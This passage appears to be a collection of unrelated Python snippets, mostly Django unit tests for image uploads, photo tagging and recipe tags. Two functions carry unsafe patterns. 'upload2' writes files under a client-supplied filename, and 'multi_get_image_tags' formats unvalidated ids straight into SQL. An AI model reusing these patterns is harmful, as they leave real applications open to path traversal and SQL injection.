self.image_name)\n\t\t\n\t\tos.remove('static/media/' + str(self.created_image.image))\n\t\tdel self.created_image", "def test_save_image(self):\n self.roses.save_image()\n image = Images.objects.all()\n self.assertEqual(len(image), 1)", "def testImageHandling(self):\n \n pm = getToolByName(self.portal, 'portal_membership')\n #make sure the person's member portrait isn't defined\n self.failUnless(pm.getPersonalPortrait('abc123').__name__ in ['defaultUser.gif', 'defaultUser.png'])\n \n # Delete the (nonexistant) image, make sure the portrait stays undefined\n self.person.setImage('DELETE_IMAGE')\n self.failUnless(pm.getPersonalPortrait('abc123').__name__ in ['defaultUser.gif', 'defaultUser.png'])\n \n self.person.setImage(TEST_GIF, content_type=\"image/gif\")\n #self.failUnlessEqual(self.person.getImage().data, TEST_GIF)\n # Try to get a 10x10 version of the image\n imageOfSizeTag = self.person.getImageOfSize(10, 10)\n self.failUnlessEqual(imageOfSizeTag, '<img src=\"http://nohost/plone/facstaffdirectory/abc123/image\" alt=\"Test Person\" title=\"Test Person\" height=\"10\" width=\"10\" />')\n self.failUnlessEqual(pm.getPersonalPortrait('abc123').__name__, 'abc123')\n \n # Try to get a scaled-by-ratio image with a width of 100.\n scaledImageTag = self.person.getScaledImageByWidth(100)\n self.failUnlessEqual(scaledImageTag, '<img src=\"http://nohost/plone/facstaffdirectory/abc123/image\" alt=\"Test Person\" title=\"Test Person\" height=\"150\" width=\"100\" />')\n \n # Delete the image, make sure the portrait is deleted as well\n self.person.setImage('DELETE_IMAGE')\n self.failUnless(pm.getPersonalPortrait('abc123').__name__ in ['defaultUser.gif', 'defaultUser.png'])\n \n #self.person.setImage(TEST_JPEG, content_type=\"image/jpeg\")\n #self.failUnlessEqual(self.person.getImage().data, TEST_JPEG)\n \n self.person.setImage(TEST_TIFF, content_type=\"image/tiff\")\n #self.failUnlessEqual(self.person.getImage().data, TEST_TIFF)\n # Try to get a 10x10 version of the image\n imageOfSizeTag = self.person.getImageOfSize(10, 10)\n self.failUnlessEqual(imageOfSizeTag, '<img src=\"http://nohost/plone/facstaffdirectory/abc123/image\" alt=\"Test Person\" title=\"Test Person\" height=\"10\" width=\"10\" />')\n \n # Try to get a scaled-by-ratio image with a width of 100.\n # TIFF handling in Plone is broken (probably the fault of PIL), handle the problem nicely.\n scaledImageTag = self.person.getScaledImageByWidth(100)\n self.failUnless(scaledImageTag == '<img src=\"http://nohost/plone/facstaffdirectory/abc123/image\" alt=\"Test Person\" title=\"Test Person\" height=\"150\" width=\"100\" />' or scaledImageTag == '')", "def test_tags_limited_to_user(self):\n user2 = get_user_model().objects.create_user(\n '[email protected]',\n '123456'\n )\n Tag.objects.create(user=user2, name='Fruity')\n tag = Tag.objects.create(user=self.user, name='Comfort Food')\n\n res = self.client.get(TAGS_URL)\n\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertEqual(len(res.data), 1)\n self.assertEqual(res.data[0]['name'], tag.name)", "def test_add_tagitem(self):\n record = self.good_record()\n record['tag'] = self.tag\n # Create a fake record in mongo\n id = self.images.insert(record)\n\n status = self.m.add_tag(id, self.system, 'testtag')\n self.assertTrue(status)\n rec = self.images.find_one({'_id': id})\n self.assertIsNotNone(rec)\n self.assertIn(self.tag, rec['tag'])\n self.assertIn('testtag', rec['tag'])", "def test_get_photos(self):\n recipe = Recipes.objects.create(chef=self.user, draft=False, private=False)\n photo = Photos.objects.create(recipe=recipe, photo_order=1)\n\n url = '/0/chefs/%i/photos' % self.user.pk\n\n resp = self.client.get(url)\n self.assertPermissionDenied(resp)\n\n headers = self.login()\n resp = self.client.get(url, **headers)\n self.assertEqual(resp.status_code, 200)\n self.assertIn('photos', resp.data)\n self.assertEqual(1, len(resp.data['photos']))\n keys = ('edit_date', 'creation_date', 'id', u'temperature', 'url', 'recipe', 'cover',\n 'time', 'instructions', 'order', 'quantity')\n self.assertEqual(set(keys), set(resp.data['photos'][0].keys()))", "def setUp(self):\n\t\tself.username = fake.user_name()\n\t\tself.password = fake.password()\n\n\t\tself.image_name = 'test.png'\n\t\tself.img_url = 'static/img/test.png'\t\n\n\t\tself.user = User.objects.create_user(\n\t\t\tusername=self.username, password=self.password)\n\t\tself.user = authenticate(username=self.username, password=self.password)\n\t\tself.client.login(username=self.username, password=self.password)\n\n\t\tself.image = Image.frombytes('L', (100, 100), \"\\x00\" * 100 * 100)\n\t\tself.image = pil_to_django(self.image, 'png')\n\n\t\tself.created_image = UserPhoto(image=self.image, name=self.image_name, created_by=self.user).save()", "def test_tags_limited_to_user(self):\n imposter = get_user_model().objects.create_user(\n email='[email protected]', password='im_an_imposter')\n Tag.objects.create(user=imposter, name='BAD_FOOD')\n tag = Tag.objects.create(user=self.user, name='fruit')\n res = self.client.get(TAG_URL)\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertEqual(len(res.data), 1)\n self.assertEqual(res.data[0]['name'], tag.name)", "def test_m2m_dependent_object_import_precision(self): #: TODO: Come up with a better name\n other_company = Company.objects.create(name='Other Co', natural_id='oc')\n _,other_user_profile = create_base_models(username='other', company=other_company)\n\n #: Create same named tags <-- assert later that they do not get filtered out as they are from a different\n #: company\n blue = Tag.objects.create(\n company=other_company,\n created_by=other_user_profile,\n name='blue',\n slug='blue',\n rank=0\n )\n green = Tag.objects.create(\n company=other_company,\n created_by=other_user_profile,\n name='green',\n slug='green',\n rank=2\n )\n\n user_profile: UserProfile = self.user_profiles[0] # See self.setUp()\n\n # ************ First Handle generating the Tags/Images Synthetically Through the Importer ************\n # Initialize Importers\n image_manager = ImporterManager(importer=ImageImporter())\n tag_manager = ImporterManager(importer=TagImporter())\n up_manager = ImporterManager(importer=UserProfileImporter())\n company_manger = ImporterManager(importer=CompanyImporter())\n user_manager = ImporterManager(importer=UserImporter())\n\n # Populate leaf models of dependency tree with kv data\n for row,image in enumerate(self.images):\n user_manager.update_kvs(field_name='username', value=user_profile.user.username, row=row)\n company_manger.update_kvs(field_name='natural_id', value=self.company.natural_id, row=row)\n\n #: Retrieve data associated with kv data\n user_manager.get_available_rows()\n company_manger.get_available_rows()\n\n #: Populate data up the dependency tree with retrieved rows\n for row,image in enumerate(self.images):\n up_manager.update_kvs('company', company_manger.get_object_or_list(row), row=row)\n up_manager.update_kvs('user', user_manager.get_object_or_list(row), row=row)\n\n #: Retrieve data associated with models depended upon\n up_manager.get_available_rows()\n\n tag_manager.update_kvs('slug', 'blue', row=0, col=0)\n tag_manager.update_kvs('slug', 'green', row=0, col=1)\n #: Anyway to avoid pushing these redundant kvs accross a row (??)\n tag_manager.update_kvs('company', company_manger.get_object_or_list(0), row=0, col=0)\n # tag_manager.update_kvs('company', company_manger.get_object_or_list(0), row=0, col=1)\n tag_manager.update_kvs('created_by', up_manager.get_object_or_list(0), row=0, col=0)\n # tag_manager.update_kvs('created_by', up_manager.get_object_or_list(0), row=0, col=1)\n\n tag_manager.update_kvs('slug', 'yellow', row=1, col=0)\n tag_manager.update_kvs('company', company_manger.get_object_or_list(1), row=1, col=0)\n tag_manager.update_kvs('created_by', up_manager.get_object_or_list(1), row=1, col=0)\n\n #: Retrieve associate intermediate data\n tag_manager.get_available_rows()\n\n self.assertEqual(len(tag_manager.get_object_or_list(0)), 2)\n for tag in tag_manager.get_object_or_list(0):\n self.assertEqual(tag.company_id, self.company.id)\n self.assertNotEqual(tag.company_id, other_company.id)\n\n self.assertIsInstance(tag_manager.get_object_or_list(1), Tag)", "def upload2(request):\n uploaded = request.read\n fileSize = int(uploaded.im_self.META[\"CONTENT_LENGTH\"])\n fileName = uploaded.im_self.META[\"HTTP_X_FILE_NAME\"] \n fileContent = uploaded(fileSize)\n \n \"\"\"Write image to disk.\"\"\"\n fn, ext = os.path.splitext(fileName)\n name = fn + timezone.now().strftime(\"%Y_%m_%d_%H_%M_%S_%f\") + base64.urlsafe_b64encode(os.urandom(settings.SALT_LENGHT)) + ext\n fileHandler = open(settings.MEDIA_ROOT + \"images/\" + name, \"wb\")\n fileHandler.write(fileContent)\n fileHandler.close()\n \n \"\"\"Create md5hash digest for image.\"\"\"\n base64string = base64.b64encode(fileContent)\n mdfive = md5.new(base64string).hexdigest()\n \n \"\"\"Write image data to db.\"\"\"\n latitude = request.GET.get('lat')\n longitude = request.GET.get('lon')\n tags = request.GET.get('tags').split(' ')\n\n image = Image(title = name, md5hash = mdfive, pub_date = timezone.now(), lat = latitude, lon = longitude)\n image.save()\n\n for tagtext in tags:\n if Tag.objects.filter(name=tagtext).exists():\n t = Tag.objects.get(name=tagtext)\n else:\n t = Tag(name = tagtext)\n t.save()\n image.tags.add(t)\n image.save()\n\n return HttpResponse('{\"success\": true}')", "def test_tags_limited_to_user(self):\n user2 = create_user('[email protected]', 'OtherPassword')\n Tag.objects.create(user=user2, name='Fruity')\n tag = Tag.objects.create(user=self.user, name='Home Food')\n\n res = self.client.get(TAGS_URL)\n\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertEqual(len(res.data), 1)\n self.assertEqual(res.data[0]['name'], tag.name)", "def test_statistics_view_set_photo_get_successful(self):\n # Create test users\n user = account_models.User.objects.create_superuser('[email protected]', 'pass')\n user.is_admin = True\n user.created_at = datetime(year=2016, month=12, day=31)\n user.save()\n\n user_1 = account_models.User.objects.create_user('[email protected]', 'test1', 'pass')\n user_1.created_at = datetime(year=2017, month=1, day=12)\n user_1.save()\n\n user_2 = account_models.User.objects.create_user('[email protected]', 'test2', 'pass')\n user_2.created_at = datetime(year=2017, month=1, day=15)\n user_2.save()\n\n user_3 = account_models.User.objects.create_user('[email protected]', 'test3', 'pass')\n user_3.created_at = datetime(year=2017, month=1, day=29)\n user_3.save()\n\n user_4 = account_models.User.objects.create_user('[email protected]', 'test4', 'pass')\n user_4.created_at = datetime(year=2017, month=1, day=31, hour=23, minute=59, second=59)\n user_4.save()\n\n user_5 = account_models.User.objects.create_user('[email protected]', 'test5', 'pass')\n user_5.created_at = datetime(year=2017, month=2, day=17)\n user_5.save()\n\n user_6 = account_models.User.objects.create_user('[email protected]', 'test6', 'pass')\n user_6.created_at = datetime(year=2017, month=2, day=21)\n user_6.save()\n\n user_7 = account_models.User.objects.create_user('[email protected]', 'test7', 'pass')\n user_7.created_at = datetime(year=2017, month=3, day=1, hour=0, minute=0, second=0)\n user_7.save()\n\n # Create test photos\n category_1 = photo_models.PhotoClassification.objects.get(name='Other')\n category_2 = photo_models.PhotoClassification.objects.get(name='Urban')\n\n photo_1 = photo_models.Photo.objects.create(image=Photo(open('apps/common/test/data/photos/small.jpg', 'rb')))\n photo_1.category.set([category_1])\n photo_1.created_at = datetime(year=2017, month=1, day=10)\n photo_1.save()\n\n photo_2 = photo_models.Photo.objects.create(\n user=user_1, image=Photo(open('apps/common/test/data/photos/small.jpg', 'rb')))\n photo_2.category.set([category_1])\n photo_2.created_at = datetime(year=2017, month=1, day=12)\n photo_2.save()\n\n photo_3 = photo_models.Photo.objects.create(\n user=user_2, image=Photo(open('apps/common/test/data/photos/small.jpg', 'rb')))\n photo_3.category.set([category_2])\n photo_3.created_at = datetime(year=2017, month=1, day=16)\n photo_3.save()\n\n photo_4 = photo_models.Photo.objects.create(\n user=user_3, image=Photo(open('apps/common/test/data/photos/small.jpg', 'rb')))\n photo_4.category.set([category_1])\n photo_4.created_at = datetime(year=2017, month=1, day=31)\n photo_4.save()\n\n photo_5 = photo_models.Photo.objects.create(\n user=user_4, image=Photo(open('apps/common/test/data/photos/small.jpg', 'rb')))\n photo_5.category.set([category_1])\n photo_5.created_at = datetime(year=2017, month=2, day=2)\n photo_5.save()\n\n photo_6 = photo_models.Photo.objects.create(\n user=user_5, image=Photo(open('apps/common/test/data/photos/small.jpg', 'rb')))\n photo_6.category.set([category_1])\n photo_6.created_at = datetime(year=2017, month=2, day=18)\n photo_6.save()\n\n photo_7 = photo_models.Photo.objects.create(\n user=user_6, image=Photo(open('apps/common/test/data/photos/small.jpg', 'rb')))\n photo_7.category.set([category_1])\n photo_7.created_at = datetime(year=2017, month=2, day=23)\n photo_7.save()\n\n photo_8 = photo_models.Photo.objects.create(\n user=user_7, image=Photo(open('apps/common/test/data/photos/small.jpg', 'rb')))\n photo_8.category.set([category_2])\n photo_8.created_at = datetime(year=2017, month=3, day=1)\n photo_8.save()\n\n photo_9 = photo_models.Photo.objects.create(\n user=user_7, image=Photo(open('apps/common/test/data/photos/small.jpg', 'rb')))\n photo_9.category.set([category_2])\n photo_9.created_at = datetime(year=2017, month=3, day=2)\n photo_9.save()\n\n client = APIClient()\n client.force_authenticate(user)\n\n request = client.get('/api/statistics/photos')\n results = request.data['results']\n\n self.assertEquals(len(results), 4) # 3 months of data\n self.assertEquals(results[0]['date'], '2016-12-1')\n self.assertEquals(results[0]['average_photos_per_user'], 0)\n self.assertEquals(results[1]['date'], '2017-1-1')\n self.assertEquals(results[1]['average_photos_per_user'], 0.80)\n self.assertEquals(results[2]['date'], '2017-2-1')\n self.assertEquals(results[2]['average_photos_per_user'], 1.0)\n self.assertEquals(results[3]['date'], '2017-3-1')\n self.assertEquals(results[3]['average_photos_per_user'], 1.12)", "def test_tags_limited_to_user(self):\n user2 = get_user_model().objects.create_user(\n '[email protected]',\n 'testpass'\n )\n Tag.objects.create(user=user2, name='Fruity')\n tag = Tag.objects.create(user=self.user, name='Comfort Food')\n\n res = self.client.get(TAGS_URL)\n\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertEqual(len(res.data), 1)\n self.assertEqual(res.data[0]['name'], tag.name)", "def tag_image(self, owner_userid, tag_userid, image_id, tag_name):\n\t\ttry:\n\t\t\towner_userid = validation.cast_integer(owner_userid, 'owner_userid')\n\t\t\ttag_userid = validation.cast_integer(tag_userid, 'userid')\n\t\t\timage_id = validation.cast_integer(image_id, 'image_id')\n\t\t\tvalidation.required(tag_name, 'tag_name')\n\t\texcept errors.ValidationError, ex:\n\t\t\treturn utils.return_deferred_error(ex.value)\n\t\ttag_name = tag_name.strip()\n\t\t@stack\n\t\tdef tag_txn(txn, owner, tagger, image, tag):\n\t\t\ttag = tag.lower()\n\t\t\ttxn.execute(\"\"\"\n\t\t\t\tselect zoto_insert_user_image_tag(%s, %s, %s, %s)\n\t\t\t\"\"\", (owner, image, tag, tagger))\n\n\t\treturn self.app.db.runInteraction(tag_txn, owner_userid, tag_userid, image_id, tag_name)", "def test_save_image(self):\n self.new_image.save_image()\n self.assertTrue(len(Image.objects.all()) > 0)", "def model_processing(img):\n\n # assert isinstance(img, EmotionalImage)\n\n if str(img.name).find('json') > -1:\n return\n user = get_user(img.path + '/' + 'meta.json')\n filePath = img.path + '/' + img.name\n # print(\"---------------Processsing----------------\", img.name)\n\n features = extract_features(filePath)\n emotions = predict_emotions(features)\n uuid1 = uuid.uuid4()\n emImage = EmotionalImage(\n uuid1, img.name, img.path, features, emotions, \"\", \"\", \"\")\n user.images.append(emImage)\n # user.save()", "def test_photos_limited_to_user(self, api_client, test_user):\n\n user2 = get_user_model().objects.create_user(\n '[email protected]',\n 'password123'\n )\n sample_photo(user=user2)\n sample_photo(user=test_user)\n\n api_client.force_authenticate(test_user)\n res = api_client.get(PHOTO_URL)\n\n photos = Photo.objects.filter(user=test_user)\n serializer = PhotoSerializer(photos, many=True)\n\n assert res.status_code == status.HTTP_200_OK\n assert len(res.data) == 1\n assert res.data == serializer.data", "def test_tags_limited_to_user(self):\n user2 = get_user_model().objects.create_user(\n 'Other User', '[email protected]', 'otherpassword')\n Tag.objects.create(user=user2, name='Nonveg')\n tag = Tag.objects.create(user=self.user, name='Fruity')\n\n res = self.client.get(TAGS_URL)\n\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertEqual(len(res.data), 1)\n self.assertEqual(res.data[0]['name'], tag.name)", "def create_fake_data():\n s = Story.objects.create(body=\"farfrompuken is so awesome, i just love it.\",\n author_name=\"jared nuzzolillo\")\n\n img_urls = (\"https://dl.dropboxusercontent.com/u/190173/typequoting/images/u-B.png\",\n \"https://dl.dropboxusercontent.com/u/190173/typequoting/images/u-D.png\",\n \"https://dl.dropboxusercontent.com/u/190173/typequoting/images/l-f.png\",\n \"https://dl.dropboxusercontent.com/u/190173/typequoting/images/u-K.png\",\n \"https://dl.dropboxusercontent.com/u/190173/typequoting/images/l-m.png\",\n \"https://dl.dropboxusercontent.com/u/190173/typequoting/images/u-P.png\",\n \"https://dl.dropboxusercontent.com/u/190173/typequoting/images/u-T.png\",)\n\n for i, img_url in enumerate(img_urls):\n StoryImage.objects.create(\n story=s,\n image=Image.objects.create(\n url=img_url,\n name=\"name %d\" % i,\n author_name=\"Johnny %d Times\" % i,\n author_url=\"http://somewherecool%d\" % i,\n uppercase=\"uppercase %d\" % i,\n typeface=\"typeface %d\" % i))", "def test_get_image_id(self):\n self.roses.save_image()\n image_id=Images.get_image_id(self.roses.id)\n self.assertTrue(image_id.id==self.roses.id)", "def sample_photo(user, title='Lovely Photo'):\n return Photo.objects.create(user=user, title=title)", "def test_create_image(self):\n pass", "def test_photo_classification_view_set_post_update(self):\n # Test data\n user = account_models.User.objects.get(email='[email protected]')\n\n # Simulate auth\n token = test_helpers.get_token_for_user(user)\n\n # Get data from endpoint\n client = APIClient()\n client.credentials(HTTP_AUTHORIZATION='Token ' + token)\n\n payload = {\n 'name': 'Night',\n 'classification_type': 'tag'\n }\n\n request = client.post('/api/photo_classifications', data=payload, format='json')\n result = request.data\n\n self.assertEquals(result['name'], 'Night')\n\n # Query for entry as well\n classifications = photo_models.PhotoClassification.objects.all()\n\n self.assertEquals(len(classifications), 12)\n self.assertEquals(classifications[11].name, 'Night')", "def test_tags_limited_to_user(self):\n\n user2 = get_user_model().objects.create_user(\n email='[email protected]',\n password='23pass1234&'\n )\n\n Tag.objects.create(user=self.user, name='Vegan')\n Tag.objects.create(user=self.user, name='Dessert')\n Tag.objects.create(user=user2, name='Valami mas')\n\n res = self.client.get(TAGS_URL)\n\n tags = Tag.objects.filter(user=self.user).order_by('-name')\n serializer = TagSerializer(tags, many=True)\n\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertEqual(len(res.data), len(tags))\n self.assertEqual(res.data, serializer.data)", "def test_edit_image_instance(self):\n self.client.force_authenticate(self.user1)\n data = {\n \"img_name\": \"photo_user1\",\n \"img_description\": \"photo of user1\",\n \"favourite\": True,\n \"width\": 700,\n \"height\": 500,\n \"share_user\": [],\n }\n url = reverse(self.url_name_one, args=(1,))\n response = self.client.put(url, data, format=\"multipart\")\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n\n # Get edited object, convert to dict and compare with inputs\n obj = model_to_dict(Images.objects.get(id=1))\n for field, edited_data in data.items():\n self.assertEqual(edited_data, obj[field])\n # Check if image was edited to a new input\n edited_img = Image.open(self.test_pic_folder + \"/test.png\")\n self.assertEqual(edited_img.size, (700, 500))", "def test_recipe_taste_by_id_image(self):\n pass", "def test_add_same_image_two_system(self):\n record = self.good_record()\n record['tag'] = self.tag\n # Create a fake record in mongo\n id1 = self.images.insert(record.copy())\n # add testtag for systema\n status = self.m.add_tag(id1, self.system, 'testtag')\n self.assertTrue(status)\n record['system'] = 'systemb'\n id2 = self.images.insert(record.copy())\n status = self.m.add_tag(id2, 'systemb', 'testtag')\n self.assertTrue(status)\n # Now make sure testtag for first system is still\n # present\n rec = self.images.find_one({'_id': id1})\n self.assertIsNotNone(rec)\n self.assertIn('testtag', rec['tag'])", "def test_profile_image_requested_field(self):\n source_comments = [self.create_source_comment()]\n self.register_get_thread_response({\n \"id\": self.thread_id,\n \"course_id\": str(self.course.id),\n \"thread_type\": \"discussion\",\n \"children\": source_comments,\n \"resp_total\": 100,\n })\n self.register_get_user_response(self.user, upvoted_ids=[\"test_comment\"])\n self.create_profile_image(self.user, get_profile_image_storage())\n\n response = self.client.get(self.url, {\"thread_id\": self.thread_id, \"requested_fields\": \"profile_image\"})\n assert response.status_code == 200\n response_comments = json.loads(response.content.decode('utf-8'))['results']\n for response_comment in response_comments:\n expected_profile_data = self.get_expected_user_profile(response_comment['author'])\n response_users = response_comment['users']\n assert expected_profile_data == response_users[response_comment['author']]", "def test_update_multiple(self):\n tag_id = \"update_photo_tag\"\n # Get a couple of photos\n photos = self.photos[:2]\n\n # Add the tag using a list of photo objects\n self.client.photos.update(photos, tagsAdd=tag_id)\n\n # Check that it's there\n for photo in self.client.photos.list()[:2]:\n self.assertIn(tag_id, photo.tags)\n\n # Remove the tags using a list of photo ids\n self.client.photos.update([photo.id for photo in photos],\n tagsRemove=tag_id)", "def setUp(self):\n fun = Category(name=\"funny\")\n fun.save()\n lagos = Location(name=\"Lagos\")\n lagos.save()\n self.new_image = Pics(\n name=\"image\", description=\"h\", location=lagos, category=fun)", "def test_tags_limited_to_user(self):\n user2 = User.objects.create(\n email='[email protected]',\n password='test_password'\n )\n Tag.objects.create(user=user2, name='Fruity')\n Tag.objects.create(user=self.user, name='Comfort Food')\n\n res = self.client.get(TAGS_URL)\n\n tags = Tag.objects.filter(user=self.user).order_by('-name')\n serializer = TagSerializer(tags, many=True)\n\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertEqual(len(res.data), 1)\n self.assertEqual(res.data, serializer.data)", "def test_photo_classification_view_set_get_filtered_successful(self):\n # Test data\n user = account_models.User.objects.get(email='[email protected]')\n\n # Simulate auth\n token = test_helpers.get_token_for_user(user)\n\n # Get data from endpoint\n client = APIClient()\n client.credentials(HTTP_AUTHORIZATION='Token ' + token)\n\n request = client.get('/api/photo_classifications?classification=tag')\n results = request.data['results']\n\n self.assertEquals(len(results), 2)", "def test_type_image(image):\n resource = models.MediaResource(image=image)\n\n assert resource.type == models.MediaResource.TYPE_IMAGE", "def test_create_recipe_with_tags(self):\n tag1 = sample_tag(user=self.user,name='vegan')\n tag2 = sample_tag(user=self.user, name='dessert')\n payload = {\n 'title':'cheesecake',\n 'tag':[tag1.id,tag2.id],\n 'time_minutes':60,\n 'price':10.00,\n }\n res = self.client.post(RECIPE_URL,payload)\n self.assertEqual(res.status_code,status.HTTP_201_CREATED)\n recipe = Recipe.objects.get(id=res.data['id'])\n tags = recipe.tag.all()\n self.assertEqual(len(tags),2)\n self.assertIn(tag1,tags)\n self.assertIn(tag2,tags)", "def test_image_uploads_on_save(self):\n \n files_count = len(os.listdir(settings.MEDIA_ROOT + '/persons'))\n with open('media/test_images/test.jpg') as f:\n self.client.post(reverse('edit'), {'ava': f})\n files_count_after = len(os.listdir(settings.MEDIA_ROOT + '/persons'))\n # added file and thumbnail\n self.assertEquals(files_count_after - files_count, 2) \n \n # test image scales \n from PIL import Image\n im = Image.open(settings.MEDIA_ROOT + '/persons/test.thumbnail.jpg')\n thumbnail_size = Person.thumbnail_size\n self.assertEquals((thumbnail_size,thumbnail_size), im.size)", "def test_api_thumbnail_retrieve_by_random_user(self):\n user = UserFactory()\n\n self.assert_user_cannot_retrieve_thumbnail(user, self.some_thumbnail)", "def test_get_imagelist_inmutable(self):\n images1 = self.mock_master.get_imagelist(self.region1)\n images2 = self.mock_master.get_imagelist(self.region1)\n r2dict = dict((i.id, i) for i in images2)\n self.assertEquals(images1, images2)\n self.assertNotEquals(id(images1), id(images2))\n for image in images1:\n self.assertIn(image.id, r2dict)\n image2 = r2dict[image.id]\n self.assertEquals(image, image2)\n self.assertNotEquals(id(image), id(image2))\n self.assertNotEquals(id(image.user_properties),\n id(image2.user_properties))", "def test_add_remove_withtag(self):\n record = self.good_record()\n # Create a fake record in mongo\n id = self.images.insert(record)\n\n session = self.m.new_session(self.auth, self.system)\n i = self.query.copy()\n status = self.m.add_tag(id, self.system, 'testtag')\n self.assertTrue(status)\n rec = self.m.lookup(session, i)\n self.assertIsNotNone(rec)\n self.assertIn(self.tag, rec['tag'])\n self.assertIn('testtag', rec['tag'])", "def test_photo_classification_view_set_post_successful(self):\n # Test data\n user = account_models.User.objects.get(email='[email protected]')\n\n # Simulate auth\n token = test_helpers.get_token_for_user(user)\n\n # Get data from endpoint\n client = APIClient()\n client.credentials(HTTP_AUTHORIZATION='Token ' + token)\n\n payload = {\n 'name': 'Night',\n 'classification_type': 'tag'\n }\n\n request = client.post('/api/photo_classifications', data=payload, format='json')\n result = request.data\n\n self.assertEquals(result['name'], 'Night')\n\n # Query for entry as well\n classifications = photo_models.PhotoClassification.objects.all()\n\n # 11 classifications are loaded by fixture\n self.assertEquals(len(classifications), 12)", "def test_emotion_is_created_and_attached_to_user(self):\n one_user = User.objects.last()\n\n emotion = EmotionFactory(user=one_user, anger=.1)\n emotion.save()\n\n self.assertEqual(one_user.emotions.first().anger, .1)", "def test_getImages(self): # GIVEN the group chat has at least one image\n testBot = bot.Bot(os.environ['bot_id'], os.environ['token'], os.environ['group_ID'])\n imageList = testBot.run() #AND THEN post_images calls the private get_images method which returns an array\n self.assertTrue(len(imageList) > 0) #THEN there should be at least one element in the array", "def test_user_photo_creation_succeeds(self):\n\t\timage_name = 'test1.png'\n\t\twith open(self.img_url, 'rb') as image:\t\t\t\n\t\t\tdata = {'image': image, 'name':image_name}\t\t\t\n\t\t\tresponse = self.client.post(reverse('photos'), data)\n\t\t\timage.close()\n\t\tself.assertEqual(response.status_code, status.HTTP_201_CREATED)\n\t\tself.assertEqual(response.data.get('name'), image_name)", "def tag_images(self, image_files, model=None):\n return self._multi_image_op(image_files, ['tag'], model=model)", "def test_create_recipe_with_tags(self):\n tag1 = sample_tag(user=self.user, name = 'Vegan')\n tag2 = sample_tag(user=self.user, name = 'Dessert')\n payload = {\n 'title': 'Avocado lime Cheesecake',\n 'tags': [tag1.id, tag2.id], # this is how tags are assigned\n 'time_minutes': 20,\n 'price': 20.00,\n }\n res = self.client.post(RECIPE_URL, payload)\n\n self.assertEqual(res.status_code, status.HTTP_201_CREATED)\n recipe = Recipe.objects.get(id=res.data['id'])\n tags = recipe.tags.all()\n\n self.assertEqual(tags.count(), 2)\n self.assertIn(tag1, tags)\n self.assertIn(tag2, tags)", "def test_retrieve_tags_assigned_unique(self):\n tag1 = Tag.objects.create(user = self.user,name='Breakfast')\n tag2 = Tag.objects.create(user=self.user,name='Lunch')\n\n recipe1 = Recipe.objects.create(user=self.user,title='Goose Liver on toast',price=5.00,time_minutes=15)\n recipe2 = Recipe.objects.create(user = self.user,title='Egg Benedict',price=5.00,time_minutes=15)\n recipe1.tags.add(tag1)\n recipe2.tags.add(tag1)\n\n res = self.client.get(TAGS_URL,{'assigned_only':1})\n self.assertEqual(len(res.data),1)", "def multi_get_image_tags(self, owner_userid, image_ids, tag_type='owner'):\n\t\tif owner_userid:\n\t\t\towner_userid = validation.cast_integer(owner_userid, 'owner_userid')\n\t\tfor id in image_ids:\n\t\t\tid = validation.cast_integer(id, 'image_id')\n\t\tif tag_type == 'owner':\n\t\t\tinclude_clause = \"AND tag_userid = t2.owner_userid\"\n\t\telif tag_type == 'public':\n\t\t\tinclude_clause = \"AND tag_userid != t2.owner_userid\"\n\t\telif tag_type == 'all':\n\t\t\tinclude_clause = \"\"\n\t\t\t\n\t\timage_list = []\n\t\tfor id in image_ids:\n\t\t\timage_list.append(\"%s\" % id)\n\n\t\towner_clause = \"\"\n\t\tif owner_userid:\n\t\t\towner_clause = \"AND t2.owner_userid = %(owner_userid)s\"\n\t\tquery_args = {'owner_userid': owner_userid}\n\t\t\t\n\t\treturn self.app.db.query(\"\"\"\n\t\t\t\tSELECT\n\t\t\t\t\ttag_name,\n\t\t\t\t\tcount(*) AS cnt_images\n\t\t\t\tFROM\n\t\t\t\t\tuser_image_tags t1\n\t\t\t\t\tJOIN user_images t2 USING (image_id)\n\t\t\t\tWHERE\n\t\t\t\t\tt1.image_id in (%s)\n\t\t\t\t\t%s\n\t\t\t\t\t%s\n\t\t\t\tGROUP BY\n\t\t\t\t\ttag_name\n\t\t\t\tORDER BY\n\t\t\t\t\ttag_name asc\n\t\t\t\t\"\"\" % (','.join(image_list), owner_clause, include_clause), query_args)", "def test_add_remove_tag(self):\n record = self.good_record()\n # Create a fake record in mongo\n id = self.images.insert(record)\n\n self.assertIsNotNone(id)\n before = self.images.find_one({'_id': id})\n self.assertIsNotNone(before)\n # Add a tag a make sure it worked\n status = self.m.add_tag(id, self.system, 'testtag')\n self.assertTrue(status)\n after = self.images.find_one({'_id': id})\n self.assertIsNotNone(after)\n self.assertIn('testtag', after['tag'])\n self.assertIn(self.tag, after['tag'])\n # Remove a tag and make sure it worked\n status = self.m.remove_tag(self.system, 'testtag')\n self.assertTrue(status)\n after = self.images.find_one({'_id': id})\n self.assertIsNotNone(after)\n self.assertNotIn('testtag', after['tag'])", "def test_upload_image(self):\n with open('apps/upload/tests/media/test.jpg') as f:\n r = post(self.client, 'upload.up_image_async', {'image': f},\n args=['questions.Question', 1])\n\n eq_(200, r.status_code)\n json_r = json.loads(r.content)\n eq_('success', json_r['status'])\n file = json_r['file']\n eq_('test.jpg', file['name'])\n eq_(90, file['width'])\n eq_(120, file['height'])\n name = '098f6b.jpg'\n message = 'Url \"%s\" does not contain \"%s\"' % (file['url'], name)\n assert (name in file['url']), message\n\n eq_(1, ImageAttachment.objects.count())\n image = ImageAttachment.objects.all()[0]\n eq_('pcraciunoiu', image.creator.username)\n eq_(150, image.file.width)\n eq_(200, image.file.height)\n eq_('question', image.content_type.model)\n eq_(1, image.object_id)", "def test_record_emotions_post_adds_emotion_to_db(self):\n from emotion_emotions.views import RecordEmotions\n num = len(Emotion.objects.all())\n request = self.request.post('', data={'image': 'data:base64,FAKE'})\n request.user = self.dan\n view = RecordEmotions(request=request)\n view.post(request)\n new_num = len(Emotion.objects.all())\n self.assertEqual(num + 1, new_num)", "def copy_images(apps, schema_editor):\n\n FieldImage = apps.get_model('field_wagtail', 'FieldImage')\n Image = apps.get_model('wagtailimages', 'Image')\n django_content_type = apps.get_model('contenttypes', 'contenttype')\n tagged_item_model = 